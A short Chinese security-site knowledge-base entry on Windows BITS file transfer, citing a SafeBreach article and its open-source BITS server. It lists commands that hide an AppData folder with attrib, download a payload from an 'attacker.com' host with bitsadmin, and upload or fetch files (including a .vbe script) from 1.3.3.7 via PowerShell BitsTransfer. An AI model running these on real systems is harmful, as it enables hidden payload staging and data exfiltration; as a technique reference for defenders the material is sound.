标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-52]   作者: fan_renlei 发表于: [2017-07-13]  [2017-07-13]被用户:凡诺 修改过

本文共 [606] 位读者顶过

https://safebreach.com/Post/Building-a-Python-BITS-Server
通过这篇文章我们可以知道BITS走HTTP,支持代理,异步传输,并且作者开源了一个BITS服务器https://github.com/SafeBreach-Labs/SimpleBITSServer,可用于下载/上传文件。使用bits的感觉很像原来windows 2000时代使用tftp,只不过那个是走UDP协议的,最后一次使用还是在Cisco设备上下载/上传running-config的时候[出自:jiwo.org]

使用系统自带的bitsadmin下载
attrib %APPDATA%\AppData\ +S +H /S /D
attrib %APPDATA%\AppData\*.* +S +H /S /D
bitsadmin /transfer /download /priority high "http://www.attacker.com/cc.dat" "%APPDATA\AppData\cc.dat"

通过powershell的BitsTransfer模块来上传
powershell.exe -Command "& {Import-Module BitsTransfer; Start-BitsTransfer -TransferType Upload -Source "%appdata%\calc.exe" -Destination 'http://1.3.3.7/calc.exe'}"

通过powershell的BitsTransfer模块来下载

powershell.exe -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://1.3.3.7/1.vbe' "%APPDATA%\1.vbe"}"


评论

暂无
发表评论
 返回顶部 
热度(606)
 关注微信